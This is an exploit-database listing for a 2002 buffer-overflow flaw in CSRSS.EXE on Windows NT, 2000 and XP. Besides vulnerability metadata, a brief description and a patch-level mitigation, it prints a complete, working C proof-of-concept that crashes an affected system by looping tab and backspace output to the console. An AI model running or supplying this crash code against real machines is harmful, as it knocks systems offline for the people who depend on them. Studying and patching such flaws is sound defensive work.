header-logo
Suggest Exploit
vendor:
Windows NT, 2000, XP
by:
SecurityFocus
7.5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Windows NT, 2000, XP
Affected Version From: Windows NT
Affected Version To: Windows XP
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2002

CSRSS.EXE Buffer Overflow Vulnerability

If certain combinations of special "whitespace" characters followed by "backspace" characters are output in high-level console I/O, a user could successfully crash a Windows NT, 2000, or XP system.

Mitigation:

Ensure that all systems are running the latest version of Windows NT, 2000, or XP.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/3478/info

CSRSS.EXE is the Windows NT Client Server Run-time Subsystem. It is responsible for console windows and the creation and deletion of threads. The Windows NT kernel is dependant on this service and will halt if the service stops for any reason.

If certain combinations of special "whitespace" characters followed by "backspace" characters are output in high-level console I/O, a user could successfully crash a Windows NT, 2000, or XP system. 

#include <stdio.h>

int main(void)
{
while (1)
printf("\t\t\b\b\b\b\b\b");
return 0;
}

Navigation

Suggest Exploit

Services By CQR